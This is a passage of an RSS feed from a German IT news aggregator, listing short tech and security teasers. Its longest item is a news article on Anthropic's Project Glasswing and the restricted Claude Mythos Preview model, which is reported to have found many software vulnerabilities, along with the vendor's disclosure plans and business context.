href="https://appleinsider.com/articles/26/04/10/apple-pay-scams-are-rife-heres-how-to-protect-yourself-and-your-money?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244002?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Gave 4 AI Agents a Corporate Bank Account. Here’s How I Stopped Them From Draining It.]]></title>
<description><![CDATA[A technical build log of the Multi-Agent Control Room, where AI agents pay invoices, escalate denials, and every action is identity-governed through OPA policies, RFC 8693 delegation tokens, and the Maverics AI Identity Gateway. Four AI agents share a corporate…
Read more →
The post I Gave 4 AI A...]]></description>
<link>https://tsecurity.de/de/3422623/it-security-nachrichten/i-gave-4-ai-agents-a-corporate-bank-account-heres-how-i-stopped-them-from-draining-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3422623/it-security-nachrichten/i-gave-4-ai-agents-a-corporate-bank-account-heres-how-i-stopped-them-from-draining-it/</guid>
<pubDate>Fri, 10 Apr 2026 08:21:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A technical build log of the Multi-Agent Control Room, where AI agents pay invoices, escalate denials, and every action is identity-governed through OPA policies, RFC 8693 delegation tokens, and the Maverics AI Identity Gateway. Four AI agents share a corporate…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/i-gave-4-ai-agents-a-corporate-bank-account-heres-how-i-stopped-them-from-draining-it/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/i-gave-4-ai-agents-a-corporate-bank-account-heres-how-i-stopped-them-from-draining-it/">I Gave 4 AI Agents a Corporate Bank Account. Here’s How I Stopped Them From Draining It.</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I guess avoid Huion if you plan on using wayland]]></title>
<description><![CDATA[I've discussed with Huions support team after adding my experience of a issue in a report to Pop_OS! cosmic repo about huion tablets not working proper(at least the screen versions) and after describing my issues to the customer support team they hit me back with the "just switch to x11, heres ho...]]></description>
<link>https://tsecurity.de/de/3421986/linux-tipps/i-guess-avoid-huion-if-you-plan-on-using-wayland/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3421986/linux-tipps/i-guess-avoid-huion-if-you-plan-on-using-wayland/</guid>
<pubDate>Fri, 10 Apr 2026 01:09:35 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I've discussed with Huions support team after adding my experience of a issue in a report to Pop_OS! cosmic repo about huion tablets not working proper(at least the screen versions) and after describing my issues to the customer support team they hit me back with the "just switch to x11, heres how to". I get it. development costs money. but x11 is being phased out by majority of distros, slowly, but surely. Why should anyone invest into huion products if they themselves can't even invest in their own community, sure, majority of their buyers are windows based, but even a slow moving update is better than declaring "just erase your OS and get something that supports it then, silly", and to those who may be thinking "dude just switch to x11" cant, COSMIC only supports wayland, and I've fine tuned my OS to my needs already. I'm not gonna dump 10s if not 100s of hours of fine tuning down the drain for a device. all in all.. yeah, im bitching, but at the same time i think it has at least *some* merits</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/GodsBadAssBlade"> /u/GodsBadAssBlade </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1sgxw5u/i_guess_avoid_huion_if_you_plan_on_using_wayland/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1sgxw5u/i_guess_avoid_huion_if_you_plan_on_using_wayland/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[MSI's RTX3050 AutoCAD-capable laptop gets a huge $200 price cut — 15.6 inch Thin A15 is under $700, but it won't be this price for long]]></title>
<description><![CDATA[MSI’s Thin A15 pairs a Ryzen 5 7535HS processor with 16GB of DDR4 memory and a 512GB NVMe SSD for AutoCAD projects and technical multitasking.]]></description>
<link>https://tsecurity.de/de/3420611/it-nachrichten/msis-rtx3050-autocad-capable-laptop-gets-a-huge-200-price-cut-156-inch-thin-a15-is-under-700-but-it-wont-be-this-price-for-long/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3420611/it-nachrichten/msis-rtx3050-autocad-capable-laptop-gets-a-huge-200-price-cut-156-inch-thin-a15-is-under-700-but-it-wont-be-this-price-for-long/</guid>
<pubDate>Thu, 09 Apr 2026 15:32:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[MSI’s Thin A15 pairs a Ryzen 5 7535HS processor with 16GB of DDR4 memory and a 512GB NVMe SSD for AutoCAD projects and technical multitasking.]]></content:encoded>
</item>
<item>
<title><![CDATA[SIEM Detection is Failing. Here’s What Stronger Teams Do Instead.]]></title>
<description><![CDATA[Stop running your SOC like it’s 2012. Learn why modern detection engineering requires shifting away from legacy SIEM architectures toward a product-centric strategy that prioritizes data quality, contextual enrichment, and AI-native workflows over raw log volume. The post SIEM Detection…
Read mor...]]></description>
<link>https://tsecurity.de/de/3416391/it-security-nachrichten/siem-detection-is-failing-heres-what-stronger-teams-do-instead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3416391/it-security-nachrichten/siem-detection-is-failing-heres-what-stronger-teams-do-instead/</guid>
<pubDate>Wed, 08 Apr 2026 09:21:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Stop running your SOC like it’s 2012. Learn why modern detection engineering requires shifting away from legacy SIEM architectures toward a product-centric strategy that prioritizes data quality, contextual enrichment, and AI-native workflows over raw log volume. The post SIEM Detection…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/siem-detection-is-failing-heres-what-stronger-teams-do-instead/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/siem-detection-is-failing-heres-what-stronger-teams-do-instead/">SIEM Detection is Failing. Here’s What Stronger Teams Do Instead.</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic says its most powerful AI cyber model is too dangerous to release publicly — so it built Project Glasswing]]></title>
<description><![CDATA[Anthropic on Tuesday announced Project Glasswing, a sweeping cybersecurity initiative that pairs an unreleased frontier AI model — Claude Mythos Preview — with a coalition of twelve major technology and finance companies in an effort to find and patch software vulnerabilities across the world's m...]]></description>
<link>https://tsecurity.de/de/3415129/it-nachrichten/anthropic-says-its-most-powerful-ai-cyber-model-is-too-dangerous-to-release-publicly-so-it-built-project-glasswing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3415129/it-nachrichten/anthropic-says-its-most-powerful-ai-cyber-model-is-too-dangerous-to-release-publicly-so-it-built-project-glasswing/</guid>
<pubDate>Tue, 07 Apr 2026 20:32:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.anthropic.com/">Anthropic</a> on Tuesday announced <a href="https://www.anthropic.com/glasswing">Project Glasswing</a>, a sweeping cybersecurity initiative that pairs an unreleased frontier AI model — Claude Mythos Preview — with a coalition of twelve major technology and finance companies in an effort to find and patch software vulnerabilities across the world's most critical infrastructure before adversaries can exploit them.</p><p>The launch partners include <a href="https://aws.amazon.com/">Amazon Web Services</a>, <a href="https://www.apple.com/">Apple</a>, <a href="https://www.broadcom.com/">Broadcom</a>, <a href="http://cisco.com/#tabs-69d6a56dd3-item-fdd67b2fb8-tab">Cisco</a>, <a href="https://www.crowdstrike.com/en-us/">CrowdStrike</a>, <a href="https://www.google.com/">Google</a>, <a href="https://www.jpmorganchase.com/">JPMorganChase</a>, <a href="https://www.linuxfoundation.org/">the Linux Foundation</a>, <a href="https://microsoft.com/">Microsoft</a>, <a href="https://nvidia.com/">Nvidia</a>, and <a href="https://www.paloaltonetworks.com/">Palo Alto Networks</a>. Anthropic says it has also extended access to more than 40 additional organizations that build or maintain critical software, and is committing up to $100 million in usage credits for Claude Mythos Preview across the effort, along with $4 million in direct donations to open-source security organizations.</p><p>The announcement arrives at a moment of extraordinary momentum — and extraordinary scrutiny — for the San Francisco-based AI startup. Anthropic disclosed on Sunday that its annualized revenue run rate has <a href="https://www.anthropic.com/news/google-broadcom-partnership-compute">surpassed $30 billion</a>, up from approximately $9 billion at the end of 2025, and the number of business customers each spending over $1 million annually now exceeds 1,000, doubling in less than two months. The company simultaneously announced a <a href="https://www.anthropic.com/news/google-broadcom-partnership-compute">multi-gigawatt compute deal</a> with Google and Broadcom. On the same day, <a href="https://www.bloomberg.com/news/articles/2026-04-07/anthropic-poaches-microsoft-executive-to-lead-infrastructure">Bloomberg reported</a> that Anthropic had poached a senior Microsoft executive, Eric Boyd, to lead its infrastructure expansion.</p><p>But Glasswing is something categorically different from a revenue milestone or a compute deal. It’s Anthropic's most ambitious attempt to translate frontier AI capabilities — capabilities the company itself describes as dangerous — into a defensive advantage before those same capabilities proliferate to hostile actors.</p><h2><b>Why Anthropic built a model it considers too dangerous to release publicly</b></h2><p>At the center of <a href="https://www.anthropic.com/glasswing">Project Glasswing</a> sits Claude Mythos Preview, a general-purpose frontier model that Anthropic says has already identified thousands of high-severity zero-day vulnerabilities — meaning flaws previously unknown to software developers — in every major operating system and every major web browser, along with a range of other critical software.</p><p>The company is not making the model generally available.</p><p>"We do not plan to make Claude Mythos Preview generally available due to its cybersecurity capabilities," Newton Cheng, Frontier Red Team Cyber Lead at Anthropic, told VentureBeat in an exclusive interview. "However, given the rate of AI progress, it will not be long before such capabilities proliferate, potentially beyond actors who are committed to deploying them safely. The fallout — for economies, public safety, and national security — could be severe."</p><p>That language — "the fallout could be severe" — is striking coming from the company that built the model. Anthropic is effectively arguing that the tool it created is powerful enough to reshape the cybersecurity landscape, and that the only responsible thing to do is to keep it restricted while giving defenders a head start.</p><p>The technical results reinforce that claim. According to Anthropic's press release, Mythos Preview was able to find nearly all of the vulnerabilities it surfaced, and develop many related exploits, entirely autonomously, without any human steering. Three examples stand out: The model found a 27-year-old vulnerability in <a href="https://www.openbsd.org/">OpenBSD</a> — widely regarded as one of the most security-hardened operating systems in the world and commonly used to run firewalls and critical infrastructure. The flaw allowed an attacker to remotely crash any machine running the OS simply by connecting to it. It also discovered a 16-year-old vulnerability in <a href="https://www.ffmpeg.org/">FFmpeg</a> — the near-ubiquitous video encoding and decoding library — in a line of code that automated testing tools had exercised five million times without ever catching the problem. And perhaps most alarmingly, Mythos Preview autonomously found and chained together several vulnerabilities in the <a href="https://www.kernel.org/">Linux kernel</a> to escalate from ordinary user access to complete control of the machine.</p><p>All three vulnerabilities have been reported to the relevant maintainers and have since been patched. For many other vulnerabilities still in the remediation pipeline, Anthropic says it is publishing cryptographic hashes of the details today, with plans to reveal specifics after fixes are in place.</p><p>On the <a href="https://www.cybergym.io/">CyberGym evaluation benchmark</a>, Mythos Preview scored 83.1%, compared to 66.6% for Claude Opus 4.6, Anthropic's next-best model. The gap is even wider on coding benchmarks: Mythos Preview achieves 93.9% on SWE-bench Verified versus 80.8% for Opus 4.6, and 77.8% on SWE-bench Pro versus 53.4%.</p><h2><b>How Anthropic plans to disclose thousands of zero-days without overwhelming open-source maintainers</b></h2><p>Finding thousands of zero-days at once sounds impressive. Actually handling the output responsibly is a logistical nightmare — and one of the sharpest criticisms that security researchers have raised about AI-driven vulnerability discovery. Flooding open-source maintainers, many of whom are unpaid volunteers, with an avalanche of critical bug reports could easily do more harm than good.</p><p>Cheng told VentureBeat that Anthropic has built a triage pipeline specifically to manage this problem. "We triage every bug that we find and then send the highest severity bugs to professional human triagers we have contracted to assist in our disclosure process by manually validating every bug report before we send it out to ensure that we send only high-quality reports to maintainers," he said.</p><p>That pipeline is designed to prevent exactly the scenario that maintainers fear most: an automated firehose of unverified reports. "We do not submit large volumes of findings to a single project without first reaching out in an effort to agree on a pace the maintainer can sustain," Cheng added.</p><p>When Anthropic has access to the source code, the company aims to include a candidate patch with every report, labeled by provenance — meaning the maintainer knows the patch was written or reviewed by a model — and offers to collaborate on a production-quality fix. "Models can write patches," Cheng noted, "but there are many factors that impact patch quality, and we strongly recommend that autonomously-written patches are put under the same scrutiny and testing that human-written patches are."</p><p>On disclosure timelines, Anthropic says it follows a coordinated vulnerability disclosure framework. Once a patch is available, the company will generally wait 45 days before publishing full technical details, giving downstream users time to deploy the fix before exploitation information becomes public. Cheng said the company may shorten that buffer "if the details are already publicly known through other channels, or if earlier publication would materially help defenders identify and mitigate ongoing attacks," or extend it "when patch deployment is unusually complex or the affected footprint is unusually broad."</p><p>Those are reasonable principles, but they will be tested at a scale that no vulnerability disclosure program has ever attempted. The sheer volume of findings — thousands of zero-days across every major platform — means that even a well-designed triage process will face bottlenecks. And the 45-day disclosure window assumes that maintainers can actually produce, test, and ship a patch in that time, which is far from guaranteed for complex kernel-level bugs or deeply embedded cryptographic flaws.</p><h2><b>The source code leak, the CMS blunder, and why trust is Anthropic's biggest vulnerability</b></h2><p>The irony of a company claiming to build the most capable cyber model ever constructed while simultaneously suffering a string of embarrassing security lapses has not been lost on observers.</p><p>In late March, a draft blog post about Mythos was left in an <a href="https://fortune.com/2026/03/26/anthropic-says-testing-mythos-powerful-new-ai-model-after-data-leak-reveals-its-existence-step-change-in-capabilities/">unsecured and publicly searchable</a> data store — a CMS misconfiguration that exposed roughly 3,000 internal assets, including what appeared to be strategic plans for the model's rollout. Days later, on March 31, anyone who ran npm install on Claude Code pulled down Anthropic's <a href="https://venturebeat.com/technology/claude-codes-source-code-appears-to-have-leaked-heres-what-we-know">complete original source code</a> — 512,000 lines — for approximately three hours due to a packaging error, an incident that drew widespread attention in the developer community and was first reported by VentureBeat.</p><p>When asked why partners and governments should trust Anthropic as the custodian of a model it describes as having unprecedented cyber capabilities, Cheng was direct. "Security is central to how we build and ship," he told VentureBeat. "These two incidents, a blog CMS misconfiguration and an npm packaging error, were human errors in publishing tooling, not breaches of our security architecture. We've made changes to prevent these from happening again, and we'll continue to improve our processes."</p><p>It is a technically accurate distinction — neither incident involved a breach of Anthropic's core model weights, training infrastructure, or API systems — but it is also a distinction that may prove difficult to sustain as a public argument. For an organization asking governments and Fortune 500 companies to trust it with a tool that can autonomously find and exploit vulnerabilities in the Linux kernel, even minor operational lapses carry outsized reputational risk. The fact that the Mythos leak itself was what first alerted the security community to the model's existence, weeks before the planned announcement, underscores the point.</p><h2><b>What Microsoft, CrowdStrike, and the Linux Foundation found when they tested the model</b></h2><p>The coalition's breadth is notable. It includes direct competitors — <a href="https://www.google.com/">Google</a> and <a href="https://microsoft.com/">Microsoft</a> — alongside cybersecurity incumbents, financial institutions, and the steward of the world's largest open-source ecosystem. And several partners have already been running Mythos Preview against their own infrastructure for weeks.</p><p>CrowdStrike's CTO Elia Zaitsev framed the initiative in terms of collapsing timelines: "The window between a vulnerability being discovered and being exploited by an adversary has collapsed — what once took months now happens in minutes with AI." AWS Vice President and CISO Amy Herzog said her teams have already been testing Mythos Preview against critical codebases, where the model is "already helping us strengthen our code." And Microsoft's Global CISO Igor Tsyganskiy noted that when tested against CTI-REALM, Microsoft's open-source security benchmark, "Claude Mythos Preview showed substantial improvements compared to previous models."</p><p>Perhaps the most revealing comment came from Jim Zemlin, CEO of the Linux Foundation, who pointed to the fundamental asymmetry that has plagued open-source security for decades: "In the past, security expertise has been a luxury reserved for organizations with large security teams. Open-source maintainers — whose software underpins much of the world's critical infrastructure — have historically been left to figure out security on their own." Project Glasswing, he said, "offers a credible path to changing that equation."</p><p>To back that claim with dollars, Anthropic says it has donated $2.5 million to Alpha-Omega and OpenSSF through <a href="https://www.linuxfoundation.org/">the Linux Foundation</a>, and $1.5 million to the <a href="https://www.apache.org/">Apache Software Foundation</a>. Maintainers interested in access can apply through Anthropic's Claude for Open Source program.</p><h2><b>Inside the pricing, the compute deal, and Anthropic's path toward a potential IPO</b></h2><p>After the research preview period — during which Anthropic's $100 million credit commitment will cover most usage — Claude Mythos Preview will be available to participants at $25 per million input tokens and $125 per million output tokens. Participants can access the model through the <a href="https://platform.claude.com/">Claude API,</a> <a href="https://aws.amazon.com/bedrock/">Amazon Bedrock</a>, Google Cloud's <a href="https://cloud.google.com/vertex-ai?hl=en">Vertex AI</a>, and <a href="https://azure.microsoft.com/en-us/products/ai-foundry">Microsoft Foundry</a>.</p><p>Those prices reflect the model's computational intensity. The draft blog post that leaked in March described Mythos as a large, compute-intensive model that would be expensive for both Anthropic and its customers to serve. Anthropic's solution is to develop and launch new safeguards with an upcoming Claude Opus model, allowing the company to "improve and refine them with a model that does not pose the same level of risk as Mythos Preview," as Cheng told VentureBeat. Security professionals whose legitimate work is affected by those safeguards will be able to apply to an upcoming Cyber Verification Program.</p><p>The financial context matters. The same day <a href="https://www.anthropic.com/glasswing">Project Glasswing</a> launched, Anthropic disclosed its revenue milestone and the Google-Broadcom compute deal. Broadcom signed an expanded deal with Anthropic that will give the AI startup access to about 3.5 gigawatts worth of computing capacity drawing on Google's AI processors, <a href="https://www.cnbc.com/2026/04/06/broadcom-agrees-to-expanded-chip-deals-with-google-anthropic.html">according to CNBC</a>. The scale of compute being marshaled is staggering — and it helps explain why Anthropic needs both the revenue from enterprise cybersecurity partnerships and the infrastructure to serve a model of Mythos Preview's size.</p><p>The timing also intersects with growing speculation about Anthropic's path to a public offering. The company is reportedly evaluating an <a href="https://www.bloomberg.com/news/articles/2026-03-27/claude-ai-maker-anthropic-said-to-weigh-ipo-as-soon-as-october">IPO as early as October 2026</a>. A high-profile, government-adjacent cybersecurity initiative with blue-chip partners is exactly the kind of program that burnishes an IPO narrative — particularly when the company can simultaneously point to $30 billion in annualized revenue and a compute footprint measured in gigawatts.</p><h2><b>Anthropic says defenders have months, not years, before adversaries catch up</b></h2><p>The most consequential question raised by <a href="https://www.anthropic.com/glasswing">Project Glasswing</a> is not whether Mythos Preview's capabilities are real — the partner endorsements and patched vulnerabilities suggest they are — but how much time defenders actually have before similar capabilities are available to adversaries.</p><p>Cheng was candid about the timeline. "Frontier AI capabilities are likely to advance substantially over just the next few months," he told VentureBeat. "Given the rate of AI progress, it will not be long before such capabilities proliferate, potentially beyond actors who are committed to deploying them safely." He described Project Glasswing as "an important step toward giving defenders a durable advantage in the coming AI-driven era of cybersecurity" but added a crucial caveat: "It's important to note, this is a starting point. No one organization can solve these cybersecurity problems alone."</p><p>That framing — months, not years — is worth taking seriously. DARPA launched its original <a href="https://en.wikipedia.org/wiki/2016_Cyber_Grand_Challenge">Cyber Grand Challenge in 2016</a>, a competition to create automatic defensive systems capable of reasoning about flaws, formulating patches, and deploying them on a network in real time. At the time, the winning AI-powered bot, Mayhem, finished last when placed against human teams at DEF CON. A decade later, Anthropic is claiming that a frontier AI model can find vulnerabilities that survived 27 years of expert human review and millions of automated security tests — and can chain exploits together autonomously to achieve full system compromise.</p><p>The delta between those two data points illustrates why the industry is treating this as a genuine inflection point, not a marketing exercise. Anthropic itself has firsthand experience with the offensive side of this equation: the company disclosed in November 2025 that a Chinese state-sponsored group achieved 80 to 90 percent autonomous tactical execution using Claude across approximately 30 targets, according to Anthropic's <a href="https://www.anthropic.com/news/disrupting-AI-espionage">misuse report</a>.</p><p><a href="https://www.anthropic.com/glasswing">Project Glasswing</a> arrives during one of the most turbulent weeks in Anthropic's history. In the span of days, the company has announced a model it considers too dangerous for public release, disclosed that its revenue has tripled, sealed a multi-gigawatt compute deal, hired a senior Microsoft executive, made it more expensive for Claude Code subscribers to use third-party tools like OpenClaw, and weathered a major outage of its Claude chatbot on Tuesday morning. Anthropic says it will report publicly on what it has learned within 90 days. In the medium term, the company has proposed that an independent, third-party body might be the ideal home for continued work on large-scale cybersecurity projects.</p><p>Whether any of that is fast enough depends on a race that is already underway. Anthropic built a model that can autonomously crack open the most hardened operating systems on the planet — and is now betting that sharing it with defenders, under careful restrictions, will do more good than the inevitable moment when similar capabilities land in less careful hands. It is, in essence, a wager that transparency can outrun proliferation. The next few months will determine whether that bet pays off, or whether the glasswing's wings were never quite opaque enough to hide what was coming.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[MacBook Neo facing 3-week delays at Apple, here’s how to buy one sooner]]></title>
<description><![CDATA[If you’re in the market for Apple’s colorful new MacBook Neo, you might have to wait a few weeks to get your hands on one. Here’s the latest on MacBook Neo availability, and where you might be able to find one sooner. 



 more…]]></description>
<link>https://tsecurity.de/de/3414608/ios-mac-os/macbook-neo-facing-3-week-delays-at-apple-heres-how-to-buy-one-sooner/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3414608/ios-mac-os/macbook-neo-facing-3-week-delays-at-apple-heres-how-to-buy-one-sooner/</guid>
<pubDate>Tue, 07 Apr 2026 17:38:36 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="feat-image"><img src="https://9to5mac.com/wp-content/uploads/sites/6/2026/03/macbook-neo-citrus-0001.jpg?quality=82&amp;strip=all&amp;w=1600"></div><p>If you’re in the market for Apple’s colorful new MacBook Neo, you might have to wait a few weeks to get your hands on one. Here’s the latest on MacBook Neo availability, and where you might be able to find one sooner. </p>



 <a data-layer-pagetype="post" data-layer-postcategory="mac,macbook-neo" data-layer-viewtype="taxonomy-ninetofive_guides" data-post-id="1047039" href="https://9to5mac.com/2026/04/07/macbook-neo-facing-3-week-delays-at-apple-heres-how-to-buy-one-sooner/#more-1047039" class="more-link">more…</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[iPhone Missing Calls & Texts, Not Ringing? Here’s How to Fix It]]></title>
<description><![CDATA[A significant number of iPhone users run into situations where they discover their iPhone is not ringing or making sounds with incoming phone calls, text messages, and alerts, leading to missed calls and texts. This is hugely frustrating, but for most situations the reason why this happens is pre...]]></description>
<link>https://tsecurity.de/de/3412419/ios-mac-os/iphone-missing-calls-texts-not-ringing-heres-how-to-fix-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3412419/ios-mac-os/iphone-missing-calls-texts-not-ringing-heres-how-to-fix-it/</guid>
<pubDate>Tue, 07 Apr 2026 02:52:31 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A significant number of iPhone users run into situations where they discover their iPhone is not ringing or making sounds with incoming phone calls, text messages, and alerts, leading to missed calls and texts. This is hugely frustrating, but for most situations the reason why this happens is pretty simple; the iPhone has accidentally been ... <a class="read-more" href="https://osxdaily.com/2026/04/06/iphone-missing-calls-texts-not-ringing-heres-how-to-fix-it/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Using AI at Work? Here’s How to Avoid Accidentally Leaking Company Data]]></title>
<description><![CDATA[The rapid adoption of Generative AI Applications across enterprises has transformed productivity, automation, and decision-making. AI tools now power daily workflows by drafting emails, writing code, and analyzing data. But with this convenience comes a growing risk, unintentional data exposure.…...]]></description>
<link>https://tsecurity.de/de/3407482/it-security-nachrichten/using-ai-at-work-heres-how-to-avoid-accidentally-leaking-company-data/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3407482/it-security-nachrichten/using-ai-at-work-heres-how-to-avoid-accidentally-leaking-company-data/</guid>
<pubDate>Sat, 04 Apr 2026 13:22:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The rapid adoption of Generative AI Applications across enterprises has transformed productivity, automation, and decision-making. AI tools now power daily workflows by drafting emails, writing code, and analyzing data. But with this convenience comes a growing risk, unintentional data exposure.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/using-ai-at-work-heres-how-to-avoid-accidentally-leaking-company-data/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/using-ai-at-work-heres-how-to-avoid-accidentally-leaking-company-data/">Using AI at Work? Here’s How to Avoid Accidentally Leaking Company Data</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s What Can Happen When the US Bombs Iran’s Nuclear Sites]]></title>
<description><![CDATA[As strikes continue on Iran’s nuclear facilities, the real danger isn’t the explosion, but what happens if critical safety systems fail—and how that risk could spread across the Gulf. This article has been indexed from Security Latest Read the original…
Read more →
The post Here’s What Can Happen...]]></description>
<link>https://tsecurity.de/de/3403707/it-security-nachrichten/heres-what-can-happen-when-the-us-bombs-irans-nuclear-sites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3403707/it-security-nachrichten/heres-what-can-happen-when-the-us-bombs-irans-nuclear-sites/</guid>
<pubDate>Thu, 02 Apr 2026 20:36:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>As strikes continue on Iran’s nuclear facilities, the real danger isn’t the explosion, but what happens if critical safety systems fail—and how that risk could spread across the Gulf. This article has been indexed from Security Latest Read the original…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/heres-what-can-happen-when-the-us-bombs-irans-nuclear-sites/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/heres-what-can-happen-when-the-us-bombs-irans-nuclear-sites/">Here’s What Can Happen When the US Bombs Iran’s Nuclear Sites</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tim Cook to Apple employees on 50th anniversary: ‘Here’s to the next fifty years’]]></title>
<description><![CDATA[To mark Apple's 50th-anniversary milestone, CEO Tim Cook sent a reflective internal memo to employees, quoting Steve Jobs and…
The post Tim Cook to Apple employees on 50th anniversary: ‘Here’s to the next fifty years’ appeared first on MacDailyNews.]]></description>
<link>https://tsecurity.de/de/3400877/ios-mac-os/tim-cook-to-apple-employees-on-50th-anniversary-heres-to-the-next-fifty-years/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3400877/ios-mac-os/tim-cook-to-apple-employees-on-50th-anniversary-heres-to-the-next-fifty-years/</guid>
<pubDate>Wed, 01 Apr 2026 23:54:50 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>To mark Apple's 50th-anniversary milestone, CEO Tim Cook sent a reflective internal memo to employees, quoting Steve Jobs and…</p>
<p>The post <a href="https://macdailynews.com/2026/04/01/tim-cook-to-apple-employees-on-50th-anniversary-heres-to-the-next-fifty-years/">Tim Cook to Apple employees on 50th anniversary: ‘Here’s to the next fifty years’</a> appeared first on <a href="https://macdailynews.com/">MacDailyNews</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Monthly Log: March 2026]]></title>
<description><![CDATA[In this month's edition of the Monthly Log:The iPhone Air Tradeoff I Didn’t Expect, by DevonHere's to 50 More, by John
	
						This Story is for Club Members

				Get weekly newsletters, exclusive stories, member downloads, and ad-free version of MacStories Unwind.
				See Plans

									 

				...]]></description>
<link>https://tsecurity.de/de/3397200/ios-mac-os/monthly-log-march-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3397200/ios-mac-os/monthly-log-march-2026/</guid>
<pubDate>Tue, 31 Mar 2026 20:42:05 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<nav class="ms-issue-toc"><p>In this month's edition of the Monthly Log:</p><ul><li><a href="https://www.macstories.net/club/monthly-log-march-2026/#the-iphone-air-tradeoff-i-didnt-expect" class="ms-issue-toc-item">The iPhone Air Tradeoff I Didn’t Expect, by Devon</a></li><li><a href="https://www.macstories.net/club/monthly-log-march-2026/#heres-to-50-more" class="ms-issue-toc-item">Here's to 50 More, by John</a></li></ul></nav>
	<div class="club-notice-restricted plan-">
						<h2>This Story is for Club Members</h2>

				<p>Get weekly newsletters, exclusive stories, member downloads, and ad-free version of MacStories Unwind.</p>
				<p><br><a href="https://www.macstories.net/plans?utm_source=ms&amp;utm_medium=web" class="button">See Plans</a></p>

									 

					<p>Already a member? <a href="https://www.macstories.net/?memberful_endpoint=auth">Sign in</a></p>
								</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Super Mario Bros. cartoon is back, but looks really weird thanks to AI]]></title>
<description><![CDATA[Adults of a certain age will no doubt remember The Super Mario Bros. Super Show, a cartoon from 1989 that starred our favorite sibling plumbers decades before they would take over multiplexes with an animated film franchise. The broadcast channel MeTV Toons has begun airing old episodes of the sh...]]></description>
<link>https://tsecurity.de/de/3397040/it-nachrichten/the-super-mario-bros-cartoon-is-back-but-looks-really-weird-thanks-to-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3397040/it-nachrichten/the-super-mario-bros-cartoon-is-back-but-looks-really-weird-thanks-to-ai/</guid>
<pubDate>Tue, 31 Mar 2026 19:31:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
